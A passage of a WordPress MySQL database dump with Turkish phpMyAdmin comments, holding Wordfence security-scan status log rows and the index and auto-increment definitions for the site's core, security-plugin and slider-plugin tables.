(13363, 1596880912.791671, 2, 'info', 'Getting theme list from WordPress'),
(13364, 1596880912.792392, 2, 'info', 'Found 2 themes'),
(13365, 1596880912.969149, 10, 'info', 'SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),
(13366, 1596880914.532015, 10, 'info', 'SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),
(13367, 1596880914.543996, 10, 'info', 'SUM_START:Fetching list of known malware files from Wordfence'),
(13368, 1596880914.549468, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),
(13369, 1596880914.556085, 10, 'info', 'SUM_START:Fetching list of known core files from Wordfence'),
(13370, 1596880914.558681, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),
(13371, 1596880914.567320, 10, 'info', 'SUM_START:Comparing core WordPress files against originals in repository'),
(13372, 1596880914.574300, 10, 'info', 'SUM_DISABLED:Skipping theme scan'),
(13373, 1596880914.576143, 10, 'info', 'SUM_DISABLED:Skipping plugin scan'),
(13374, 1596880914.581884, 10, 'info', 'SUM_START:Scanning for known malware files'),
(13375, 1596880914.594137, 10, 'info', 'SUM_START:Scanning for unknown files in wp-admin and wp-includes'),
(13376, 1596880915.155490, 2, 'info', '500 files indexed'),
(13377, 1596880916.694865, 2, 'info', '1000 files indexed'),
(13378, 1596880917.095185, 2, 'info', '1500 files indexed'),
(13379, 1596880917.801663, 2, 'info', '2000 files indexed'),
(13380, 1596880918.061296, 2, 'info', '2500 files indexed'),
(13381, 1596880918.469898, 2, 'info', '3000 files indexed'),
(13382, 1596880919.370555, 2, 'info', '3500 files indexed'),
(13383, 1596880919.773080, 2, 'info', '4000 files indexed'),
(13384, 1596880920.043410, 2, 'info', '4021 files indexed'),
(13385, 1596880924.638682, 2, 'info', '4521 files indexed'),
(13386, 1596880924.903292, 2, 'info', '5021 files indexed'),
(13387, 1596880924.963098, 2, 'info', '5127 files indexed'),
(13388, 1596880926.485811, 2, 'info', 'Analyzed 100 files containing 1.45 MB of data so far'),
(13389, 1596880928.071284, 2, 'info', 'Analyzed 200 files containing 2.49 MB of data so far'),
(13390, 1596880929.454074, 2, 'info', 'Analyzed 300 files containing 3.82 MB of data so far'),
(13391, 1596880930.900935, 2, 'info', 'Analyzed 400 files containing 6.27 MB of data so far'),
(13392, 1596880932.146039, 2, 'info', 'Analyzed 500 files containing 7.07 MB of data so far'),
(13393, 1596880933.410167, 2, 'info', 'Analyzed 600 files containing 7.94 MB of data so far'),
(13394, 1596880934.346306, 2, 'info', 'Analyzed 700 files containing 9.77 MB of data so far'),
(13395, 1596880934.830535, 2, 'info', 'Analyzed 800 files containing 11.81 MB of data so far'),
(13396, 1596880935.985054, 2, 'info', 'Analyzed 900 files containing 14.37 MB of data so far'),
(13397, 1596880937.128806, 2, 'info', 'Analyzed 1000 files containing 17.24 MB of data so far'),
(13398, 1596880940.409233, 2, 'info', 'Analyzed 1100 files containing 17.71 MB of data so far'),
(13399, 1596880941.192941, 2, 'info', 'Analyzed 1200 files containing 18.15 MB of data so far'),
(13400, 1596880942.276508, 2, 'info', 'Analyzed 1300 files containing 18.44 MB of data so far'),
(13401, 1596880943.335851, 2, 'info', 'Analyzed 1400 files containing 19.39 MB of data so far'),
(13402, 1596880945.179661, 2, 'info', 'Analyzed 1500 files containing 19.61 MB of data so far'),
(13403, 1596880945.976403, 2, 'info', 'Analyzed 1600 files containing 20.66 MB of data so far'),
(13404, 1596880946.757309, 2, 'info', 'Analyzed 1700 files containing 23.28 MB of data so far'),
(13405, 1596880947.024137, 2, 'info', 'Analyzed 1800 files containing 23.31 MB of data so far'),
(13406, 1596880947.382376, 2, 'info', 'Analyzed 1900 files containing 23.34 MB of data so far'),
(13407, 1596880947.991855, 2, 'info', 'Analyzed 2000 files containing 23.72 MB of data so far'),
(13408, 1596880948.582460, 2, 'info', 'Analyzed 2100 files containing 24.47 MB of data so far'),
(13409, 1596880949.176921, 2, 'info', 'Analyzed 2200 files containing 25.18 MB of data so far'),
(13410, 1596880949.654349, 2, 'info', 'Analyzed 2300 files containing 25.82 MB of data so far'),
(13411, 1596880950.053350, 2, 'info', 'Analyzed 2400 files containing 25.85 MB of data so far'),
(13412, 1596880950.738483, 2, 'info', 'Analyzed 2500 files containing 25.88 MB of data so far'),
(13413, 1596880951.032381, 2, 'info', 'Analyzed 2600 files containing 25.9 MB of data so far'),
(13414, 1596880951.284430, 2, 'info', 'Analyzed 2700 files containing 25.94 MB of data so far'),
(13415, 1596880951.528209, 2, 'info', 'Analyzed 2800 files containing 25.97 MB of data so far'),
(13416, 1596880951.850829, 2, 'info', 'Analyzed 2900 files containing 26 MB of data so far'),
(13417, 1596880952.534425, 2, 'info', 'Analyzed 3000 files containing 27.24 MB of data so far'),
(13418, 1596880953.876312, 2, 'info', 'Analyzed 3100 files containing 28.21 MB of data so far'),
(13419, 1596880954.977954, 2, 'info', 'Analyzed 3200 files containing 29.91 MB of data so far'),
(13420, 1596880958.357805, 2, 'info', 'Analyzed 3300 files containing 35.41 MB of data so far'),
(13421, 1596880959.202383, 2, 'info', 'Analyzed 3400 files containing 37.07 MB of data so far'),
(13422, 1596880960.217672, 2, 'info', 'Analyzed 3500 files containing 37.92 MB of data so far'),
(13423, 1596880961.109309, 2, 'info', 'Analyzed 3600 files containing 38.92 MB of data so far'),
(13424, 1596880962.706117, 2, 'info', 'Analyzed 3700 files containing 41.56 MB of data so far'),
(13425, 1596880963.514196, 2, 'info', 'Analyzed 3800 files containing 43.31 MB of data so far'),
(13426, 1596880964.202698, 2, 'info', 'Analyzed 3900 files containing 43.68 MB of data so far'),
(13427, 1596880964.918293, 2, 'info', 'Analyzed 4000 files containing 45.05 MB of data so far'),
(13428, 1596880965.925153, 2, 'info', 'Analyzed 4100 files containing 48.46 MB of data so far'),
(13429, 1596880966.932247, 2, 'info', 'Analyzed 4200 files containing 49.99 MB of data so far'),
(13430, 1596880967.878798, 2, 'info', 'Analyzed 4300 files containing 52.09 MB of data so far'),
(13431, 1596880970.022476, 2, 'info', 'Analyzed 4400 files containing 54.21 MB of data so far'),
(13432, 1596880971.059676, 2, 'info', 'Analyzed 4500 files containing 55.47 MB of data so far'),
(13433, 1596880973.236674, 2, 'info', 'Analyzed 4600 files containing 64.4 MB of data so far'),
(13434, 1596880977.170627, 2, 'info', 'Analyzed 4700 files containing 67.75 MB of data so far'),
(13435, 1596880978.492319, 2, 'info', 'Analyzed 4800 files containing 70.23 MB of data so far'),
(13436, 1596880979.875252, 2, 'info', 'Analyzed 4900 files containing 72.8 MB of data so far'),
(13437, 1596880980.736019, 2, 'info', 'Analyzed 5000 files containing 75.77 MB of data so far'),
(13438, 1596880981.963546, 2, 'info', 'Analyzed 5100 files containing 77.3 MB of data so far'),
(13439, 1596880982.187736, 2, 'info', 'Analyzed 5127 files containing 77.69 MB of data.'),
(13440, 1596880982.189214, 10, 'info', 'SUM_ENDOK:Comparing core WordPress files against originals in repository'),
(13441, 1596880982.204767, 10, 'info', 'SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),
(13442, 1596880982.218151, 10, 'info', 'SUM_ENDOK:Scanning for known malware files'),
(13443, 1596880982.244027, 10, 'info', 'SUM_START:Check for publicly accessible configuration files, backup files and logs'),
(13444, 1596880982.355213, 10, 'info', 'SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),
(13445, 1596880982.376900, 10, 'info', 'SUM_START:Scanning file contents for infections and vulnerabilities'),
(13446, 1596880982.383254, 10, 'info', 'SUM_START:Scanning file contents for URLs on a domain blacklist'),
(13447, 1596880984.623772, 2, 'info', 'Starting scan of file contents'),
(13448, 1596880985.712527, 2, 'info', 'Scanned contents of 23 additional files at 21.25 per second'),
(13449, 1596880986.729940, 2, 'info', 'Scanned contents of 69 additional files at 32.86 per second'),
(13450, 1596880987.738162, 2, 'info', 'Scanned contents of 110 additional files at 35.40 per second'),
(13451, 1596880988.741710, 2, 'info', 'Scanned contents of 145 additional files at 35.27 per second'),
(13452, 1596880990.184048, 2, 'info', 'Scanned contents of 182 additional files at 32.77 per second'),
(13453, 1596880991.184641, 2, 'info', 'Scanned contents of 218 additional files at 33.26 per second'),
(13454, 1596880994.330338, 2, 'info', 'Scanned contents of 251 additional files at 25.88 per second'),
(13455, 1596880995.332826, 2, 'info', 'Scanned contents of 274 additional files at 25.60 per second'),
(13456, 1596880996.333018, 2, 'info', 'Scanned contents of 320 additional files at 27.34 per second'),
(13457, 1596880997.334948, 2, 'info', 'Scanned contents of 357 additional files at 28.10 per second'),
(13458, 1596880998.363329, 2, 'info', 'Scanned contents of 412 additional files at 30.00 per second'),
(13459, 1596880999.367156, 2, 'info', 'Scanned contents of 448 additional files at 30.40 per second'),
(13460, 1596881000.395783, 2, 'info', 'Scanned contents of 484 additional files at 30.70 per second'),
(13461, 1596881001.527148, 2, 'info', 'Scanned contents of 509 additional files at 30.12 per second'),
(13462, 1596881002.529843, 2, 'info', 'Scanned contents of 570 additional files at 31.84 per second'),
(13463, 1596881003.548065, 2, 'info', 'Scanned contents of 617 additional files at 32.62 per second'),
(13464, 1596881004.581005, 2, 'info', 'Scanned contents of 660 additional files at 33.08 per second'),
(13465, 1596881005.596160, 2, 'info', 'Scanned contents of 695 additional files at 33.15 per second'),
(13466, 1596881006.597403, 2, 'info', 'Scanned contents of 733 additional files at 33.37 per second'),
(13467, 1596881007.611221, 2, 'info', 'Scanned contents of 781 additional files at 33.98 per second'),
(13468, 1596881008.623276, 2, 'info', 'Scanned contents of 818 additional files at 34.09 per second'),
(13469, 1596881009.631723, 2, 'info', 'Scanned contents of 846 additional files at 33.84 per second'),
(13470, 1596881012.084663, 2, 'info', 'Scanned contents of 859 additional files at 31.29 per second'),
(13471, 1596881013.275443, 2, 'info', 'Scanned contents of 894 additional files at 31.21 per second'),
(13472, 1596881014.295680, 2, 'info', 'Scanned contents of 926 additional files at 31.21 per second'),
(13473, 1596881015.315446, 2, 'info', 'Scanned contents of 965 additional files at 31.45 per second'),
(13474, 1596881016.320738, 2, 'info', 'Scanned contents of 1012 additional files at 31.93 per second'),
(13475, 1596881017.326141, 2, 'info', 'Scanned contents of 1062 additional files at 32.48 per second'),
(13476, 1596881018.348746, 2, 'info', 'Scanned contents of 1104 additional files at 32.74 per second'),
(13477, 1596881019.354808, 2, 'info', 'Scanned contents of 1158 additional files at 33.35 per second'),
(13478, 1596881020.356267, 2, 'info', 'Scanned contents of 1195 additional files at 33.45 per second'),
(13479, 1596881021.369504, 2, 'info', 'Scanned contents of 1238 additional files at 33.70 per second'),
(13480, 1596881022.397663, 2, 'info', 'Scanned contents of 1287 additional files at 34.08 per second'),
(13481, 1596881023.413891, 2, 'info', 'Scanned contents of 1333 additional files at 34.37 per second'),
(13482, 1596881024.425679, 2, 'info', 'Scanned contents of 1371 additional files at 34.45 per second'),
(13483, 1596881025.486949, 2, 'info', 'Scanned contents of 1400 additional files at 34.27 per second'),
(13484, 1596881026.490159, 2, 'info', 'Scanned contents of 1435 additional files at 34.28 per second'),
(13485, 1596881029.386412, 2, 'info', 'Scanned contents of 1445 additional files at 32.29 per second'),
(13486, 1596881030.438758, 2, 'info', 'Scanned contents of 1464 additional files at 31.96 per second'),
(13487, 1596881031.452928, 2, 'info', 'Scanned contents of 1499 additional files at 32.01 per second'),
(13488, 1596881032.485507, 2, 'info', 'Scanned contents of 1531 additional files at 31.99 per second'),
(13489, 1596881033.590955, 2, 'info', 'Scanned contents of 1561 additional files at 31.88 per second'),
(13490, 1596881034.602357, 2, 'info', 'Scanned contents of 1602 additional files at 32.06 per second'),
(13491, 1596881035.621248, 2, 'info', 'Scanned contents of 1650 additional files at 32.36 per second'),
(13492, 1596881036.687164, 2, 'info', 'Scanned contents of 1692 additional files at 32.50 per second'),
(13493, 1596881037.711136, 2, 'info', 'Scanned contents of 1730 additional files at 32.59 per second'),
(13494, 1596881038.729260, 2, 'info', 'Scanned contents of 1772 additional files at 32.75 per second'),
(13495, 1596881039.827518, 2, 'info', 'Scanned contents of 1818 additional files at 32.94 per second'),
(13496, 1596881040.884661, 2, 'info', 'Scanned contents of 1848 additional files at 32.85 per second'),
(13497, 1596881041.904987, 2, 'info', 'Scanned contents of 1894 additional files at 33.07 per second'),
(13498, 1596881042.920981, 2, 'info', 'Scanned contents of 1950 additional files at 33.45 per second'),
(13499, 1596881043.932878, 2, 'info', 'Scanned contents of 1985 additional files at 33.47 per second'),
(13500, 1596881044.952080, 2, 'info', 'Scanned contents of 2012 additional files at 33.35 per second'),
(13501, 1596881046.882659, 2, 'info', 'Scanned contents of 2016 additional files at 32.38 per second'),
(13502, 1596881047.889848, 2, 'info', 'Scanned contents of 2064 additional files at 32.63 per second'),
(13503, 1596881048.893699, 2, 'info', 'Scanned contents of 2106 additional files at 32.77 per second'),
(13504, 1596881049.902535, 2, 'info', 'Scanned contents of 2161 additional files at 33.11 per second'),
(13505, 1596881050.908741, 2, 'info', 'Scanned contents of 2209 additional files at 33.33 per second'),
(13506, 1596881051.916319, 2, 'info', 'Scanned contents of 2241 additional files at 33.31 per second'),
(13507, 1596881053.394569, 2, 'info', 'Scanned contents of 2267 additional files at 32.97 per second'),
(13508, 1596881054.445877, 2, 'info', 'Scanned contents of 2328 additional files at 33.35 per second'),
(13509, 1596881055.473487, 2, 'info', 'Scanned contents of 2376 additional files at 33.54 per second'),
(13510, 1596881056.620803, 2, 'info', 'Scanned contents of 2420 additional files at 33.62 per second'),
(13511, 1596881057.623960, 2, 'info', 'Scanned contents of 2460 additional files at 33.70 per second'),
(13512, 1596881058.674601, 2, 'info', 'Scanned contents of 2509 additional files at 33.89 per second'),
(13513, 1596881059.674699, 2, 'info', 'Scanned contents of 2541 additional files at 33.86 per second'),
(13514, 1596881060.683879, 2, 'info', 'Scanned contents of 2598 additional files at 34.16 per second'),
(13515, 1596881061.696052, 2, 'info', 'Scanned contents of 2643 additional files at 34.30 per second'),
(13516, 1596881064.062498, 2, 'info', 'Scanned contents of 2650 additional files at 33.36 per second'),
(13517, 1596881065.073558, 2, 'info', 'Scanned contents of 2694 additional files at 33.49 per second'),
(13518, 1596881066.097459, 2, 'info', 'Scanned contents of 2721 additional files at 33.40 per second'),
(13519, 1596881067.142882, 2, 'info', 'Scanned contents of 2759 additional files at 33.44 per second'),
(13520, 1596881067.183109, 2, 'info', 'Scanned contents of 2760 additional files at 33.43 per second'),
(13521, 1596881067.184759, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(13522, 1596881067.192789, 2, 'info', 'Checking 1373 host keys against Wordfence scanning servers.'),
(13523, 1596881068.505775, 2, 'info', 'Done host key check.'),
(13524, 1596881068.510944, 2, 'info', 'Checking 3 URLs from 3 sources.'),
(13525, 1596881069.280059, 2, 'info', 'Done URL check.'),
(13526, 1596881069.307438, 2, 'info', 'Done file contents scan'),
(13527, 1596881069.311476, 10, 'info', 'SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),
(13528, 1596881069.326118, 10, 'info', 'SUM_ENDOK:Scanning file contents for URLs on a domain blacklist'),
(13529, 1596881069.351285, 10, 'info', 'SUM_START:Scanning for publicly accessible quarantined files'),
(13530, 1596881069.363198, 10, 'info', 'SUM_ENDOK:Scanning for publicly accessible quarantined files'),
(13531, 1596881069.390192, 10, 'info', 'SUM_START:Scanning posts for URLs on a domain blacklist'),
(13532, 1596881069.478375, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(13533, 1596881069.479605, 2, 'info', 'Checking 4 host keys against Wordfence scanning servers.'),
(13534, 1596881070.269183, 2, 'info', 'Done host key check.'),
(13535, 1596881070.271696, 2, 'info', 'Done examining URLs'),
(13536, 1596881070.282357, 10, 'info', 'SUM_ENDOK:Scanning posts for URLs on a domain blacklist'),
(13537, 1596881070.310572, 10, 'info', 'SUM_START:Scanning comments for URLs on a domain blacklist'),
(13538, 1596881070.404359, 10, 'info', 'SUM_ENDOK:Scanning comments for URLs on a domain blacklist'),
(13539, 1596881070.429635, 10, 'info', 'SUM_START:Scanning for weak passwords'),
(13540, 1596881070.469099, 2, 'info', 'Starting password strength check on 1 users.'),
(13541, 1596881070.504916, 10, 'info', 'SUM_ENDOK:Scanning for weak passwords'),
(13542, 1596881070.516171, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(13543, 1596881077.577209, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(13544, 1596881077.602896, 10, 'info', 'SUM_START:Scanning for admin users not created through WordPress'),
(13545, 1596881077.652202, 10, 'info', 'SUM_ENDOK:Scanning for admin users not created through WordPress'),
(13546, 1596881077.684526, 10, 'info', 'SUM_START:Scanning for suspicious site options'),
(13547, 1596881077.795353, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(13548, 1596881077.796877, 2, 'info', 'Done examining URLs'),
(13549, 1596881077.802075, 10, 'info', 'SUM_ENDOK:Scanning for suspicious site options'),
(13550, 1596881077.809805, 1, 'info', '-------------------'),
(13551, 1596881077.811007, 2, 'info', 'Wordfence used 14 MB of memory for scan. Server peak memory usage was: 52 MB'),
(13552, 1596881077.811763, 1, 'info', 'Scan Complete. Scanned 5127 files, 6 plugins, 2 themes, 20 posts, 0 comments and 2862 URLs in 2 minutes 53 seconds.'),
(13553, 1596881077.812484, 10, 'info', 'SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),
(13554, 1596894118.258166, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(13555, 1596894118.262365, 1, 'info', 'Initiating quick scan'),
(13556, 1596894118.281724, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(13557, 1596894118.283169, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(13558, 1596894118.293499, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(13559, 1596894118.321624, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(13560, 1596894118.328413, 1, 'info', '-------------------'),
(13561, 1596894118.330830, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 14 MB'),
(13562, 1596894118.331634, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(13563, 1596894118.332560, 10, 'info', 'SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),
(13564, 1596980694.863192, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(13565, 1596980694.866197, 1, 'info', 'Initiating quick scan'),
(13566, 1596980694.869952, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(13567, 1596980694.870832, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(13568, 1596980694.877051, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(13569, 1596980694.893533, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(13570, 1596980694.906058, 1, 'info', '-------------------'),
(13571, 1596980694.907553, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 14 MB'),
(13572, 1596980694.908401, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(13573, 1596980694.908968, 10, 'info', 'SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wftrafficrates`
--

CREATE TABLE `zdenl_wftrafficrates` (
  `eMin` int(10) UNSIGNED NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dökümü yapılmış tablolar için indeksler
--

--
-- Tablo için indeksler `zdenl_aiowps_events`
--
ALTER TABLE `zdenl_aiowps_events`
  ADD PRIMARY KEY (`id`);

--
-- Tablo için indeksler `zdenl_aiowps_failed_logins`
--
ALTER TABLE `zdenl_aiowps_failed_logins`
  ADD PRIMARY KEY (`id`);

--
-- Tablo için indeksler `zdenl_aiowps_global_meta`
--
ALTER TABLE `zdenl_aiowps_global_meta`
  ADD PRIMARY KEY (`meta_id`);

--
-- Tablo için indeksler `zdenl_aiowps_login_activity`
--
ALTER TABLE `zdenl_aiowps_login_activity`
  ADD PRIMARY KEY (`id`);

--
-- Tablo için indeksler `zdenl_aiowps_login_lockdown`
--
ALTER TABLE `zdenl_aiowps_login_lockdown`
  ADD PRIMARY KEY (`id`);

--
-- Tablo için indeksler `zdenl_aiowps_permanent_block`
--
ALTER TABLE `zdenl_aiowps_permanent_block`
  ADD PRIMARY KEY (`id`);

--
-- Tablo için indeksler `zdenl_commentmeta`
--
ALTER TABLE `zdenl_commentmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `comment_id` (`comment_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Tablo için indeksler `zdenl_comments`
--
ALTER TABLE `zdenl_comments`
  ADD PRIMARY KEY (`comment_ID`),
  ADD KEY `comment_post_ID` (`comment_post_ID`),
  ADD KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  ADD KEY `comment_date_gmt` (`comment_date_gmt`),
  ADD KEY `comment_parent` (`comment_parent`),
  ADD KEY `comment_author_email` (`comment_author_email`(10));

--
-- Tablo için indeksler `zdenl_links`
--
ALTER TABLE `zdenl_links`
  ADD PRIMARY KEY (`link_id`),
  ADD KEY `link_visible` (`link_visible`);

--
-- Tablo için indeksler `zdenl_options`
--
ALTER TABLE `zdenl_options`
  ADD PRIMARY KEY (`option_id`),
  ADD UNIQUE KEY `option_name` (`option_name`),
  ADD KEY `autoload` (`autoload`);

--
-- Tablo için indeksler `zdenl_postmeta`
--
ALTER TABLE `zdenl_postmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `post_id` (`post_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Tablo için indeksler `zdenl_posts`
--
ALTER TABLE `zdenl_posts`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `post_name` (`post_name`(191)),
  ADD KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  ADD KEY `post_parent` (`post_parent`),
  ADD KEY `post_author` (`post_author`);

--
-- Tablo için indeksler `zdenl_revslider_css`
--
ALTER TABLE `zdenl_revslider_css`
  ADD UNIQUE KEY `id` (`id`);

--
-- Tablo için indeksler `zdenl_revslider_layer_animations`
--
ALTER TABLE `zdenl_revslider_layer_animations`
  ADD UNIQUE KEY `id` (`id`);

--
-- Tablo için indeksler `zdenl_revslider_navigations`
--
ALTER TABLE `zdenl_revslider_navigations`
  ADD UNIQUE KEY `id` (`id`);

--
-- Tablo için indeksler `zdenl_revslider_sliders`
--
ALTER TABLE `zdenl_revslider_sliders`
  ADD UNIQUE KEY `id` (`id`);

--
-- Tablo için indeksler `zdenl_revslider_slides`
--
ALTER TABLE `zdenl_revslider_slides`
  ADD UNIQUE KEY `id` (`id`);

--
-- Tablo için indeksler `zdenl_revslider_static_slides`
--
ALTER TABLE `zdenl_revslider_static_slides`
  ADD UNIQUE KEY `id` (`id`);

--
-- Tablo için indeksler `zdenl_termmeta`
--
ALTER TABLE `zdenl_termmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `term_id` (`term_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Tablo için indeksler `zdenl_terms`
--
ALTER TABLE `zdenl_terms`
  ADD PRIMARY KEY (`term_id`),
  ADD KEY `slug` (`slug`(191)),
  ADD KEY `name` (`name`(191));

--
-- Tablo için indeksler `zdenl_term_relationships`
--
ALTER TABLE `zdenl_term_relationships`
  ADD PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  ADD KEY `term_taxonomy_id` (`term_taxonomy_id`);

--
-- Tablo için indeksler `zdenl_term_taxonomy`
--
ALTER TABLE `zdenl_term_taxonomy`
  ADD PRIMARY KEY (`term_taxonomy_id`),
  ADD UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  ADD KEY `taxonomy` (`taxonomy`);

--
-- Tablo için indeksler `zdenl_usermeta`
--
ALTER TABLE `zdenl_usermeta`
  ADD PRIMARY KEY (`umeta_id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Tablo için indeksler `zdenl_users`
--
ALTER TABLE `zdenl_users`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `user_login_key` (`user_login`),
  ADD KEY `user_nicename` (`user_nicename`),
  ADD KEY `user_email` (`user_email`);

--
-- Tablo için indeksler `zdenl_wfblockediplog`
--
ALTER TABLE `zdenl_wfblockediplog`
  ADD PRIMARY KEY (`IP`,`unixday`,`blockType`);

--
-- Tablo için indeksler `zdenl_wfblocks7`
--
ALTER TABLE `zdenl_wfblocks7`
  ADD PRIMARY KEY (`id`),
  ADD KEY `type` (`type`),
  ADD KEY `IP` (`IP`),
  ADD KEY `expiration` (`expiration`);

--
-- Tablo için indeksler `zdenl_wfconfig`
--
ALTER TABLE `zdenl_wfconfig`
  ADD PRIMARY KEY (`name`);

--
-- Tablo için indeksler `zdenl_wfcrawlers`
--
ALTER TABLE `zdenl_wfcrawlers`
  ADD PRIMARY KEY (`IP`,`patternSig`);

--
-- Tablo için indeksler `zdenl_wffilechanges`
--
ALTER TABLE `zdenl_wffilechanges`
  ADD PRIMARY KEY (`filenameHash`);

--
-- Tablo için indeksler `zdenl_wffilemods`
--
ALTER TABLE `zdenl_wffilemods`
  ADD PRIMARY KEY (`filenameMD5`);

--
-- Tablo için indeksler `zdenl_wfhits`
--
ALTER TABLE `zdenl_wfhits`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k1` (`ctime`),
  ADD KEY `k2` (`IP`,`ctime`),
  ADD KEY `attackLogTime` (`attackLogTime`);

--
-- Tablo için indeksler `zdenl_wfhoover`
--
ALTER TABLE `zdenl_wfhoover`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k2` (`hostKey`);

--
-- Tablo için indeksler `zdenl_wfissues`
--
ALTER TABLE `zdenl_wfissues`
  ADD PRIMARY KEY (`id`),
  ADD KEY `lastUpdated` (`lastUpdated`),
  ADD KEY `status` (`status`),
  ADD KEY `ignoreP` (`ignoreP`),
  ADD KEY `ignoreC` (`ignoreC`);

--
-- Tablo için indeksler `zdenl_wfknownfilelist`
--
ALTER TABLE `zdenl_wfknownfilelist`
  ADD PRIMARY KEY (`id`);

--
-- Tablo için indeksler `zdenl_wflivetraffichuman`
--
ALTER TABLE `zdenl_wflivetraffichuman`
  ADD PRIMARY KEY (`IP`,`identifier`),
  ADD KEY `expiration` (`expiration`);

--
-- Tablo için indeksler `zdenl_wflocs`
--
ALTER TABLE `zdenl_wflocs`
  ADD PRIMARY KEY (`IP`);

--
-- Tablo için indeksler `zdenl_wflogins`
--
ALTER TABLE `zdenl_wflogins`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k1` (`IP`,`fail`),
  ADD KEY `hitID` (`hitID`);

--
-- Tablo için indeksler `zdenl_wfls_2fa_secrets`
--
ALTER TABLE `zdenl_wfls_2fa_secrets`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user_id` (`user_id`);

--
-- Tablo için indeksler `zdenl_wfls_settings`
--
ALTER TABLE `zdenl_wfls_settings`
  ADD PRIMARY KEY (`name`);

--
-- Tablo için indeksler `zdenl_wfnotifications`
--
ALTER TABLE `zdenl_wfnotifications`
  ADD PRIMARY KEY (`id`);

--
-- Tablo için indeksler `zdenl_wfpendingissues`
--
ALTER TABLE `zdenl_wfpendingissues`
  ADD PRIMARY KEY (`id`),
  ADD KEY `lastUpdated` (`lastUpdated`),
  ADD KEY `status` (`status`),
  ADD KEY `ignoreP` (`ignoreP`),
  ADD KEY `ignoreC` (`ignoreC`);

--
-- Tablo için indeksler `zdenl_wfreversecache`
--
ALTER TABLE `zdenl_wfreversecache`
  ADD PRIMARY KEY (`IP`);

--
-- Tablo için indeksler `zdenl_wfsnipcache`
--
ALTER TABLE `zdenl_wfsnipcache`
  ADD PRIMARY KEY (`id`),
  ADD KEY `expiration` (`expiration`),
  ADD KEY `IP` (`IP`),
  ADD KEY `type` (`type`);

--
-- Tablo için indeksler `zdenl_wfstatus`
--
ALTER TABLE `zdenl_wfstatus`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k1` (`ctime`),
  ADD KEY `k2` (`type`);

--
-- Tablo için indeksler `zdenl_wftrafficrates`
--
ALTER TABLE `zdenl_wftrafficrates`
  ADD PRIMARY KEY (`eMin`,`IP`,`hitType`);

--
-- Dökümü yapılmış tablolar için AUTO_INCREMENT değeri
--

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_aiowps_events`
--
ALTER TABLE `zdenl_aiowps_events`
  MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_aiowps_failed_logins`
--
ALTER TABLE `zdenl_aiowps_failed_logins`
  MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_aiowps_global_meta`
--
ALTER TABLE `zdenl_aiowps_global_meta`
  MODIFY `meta_id` bigint(20) NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_aiowps_login_activity`
--
ALTER TABLE `zdenl_aiowps_login_activity`
  MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_aiowps_login_lockdown`
--
ALTER TABLE `zdenl_aiowps_login_lockdown`
  MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_aiowps_permanent_block`
--
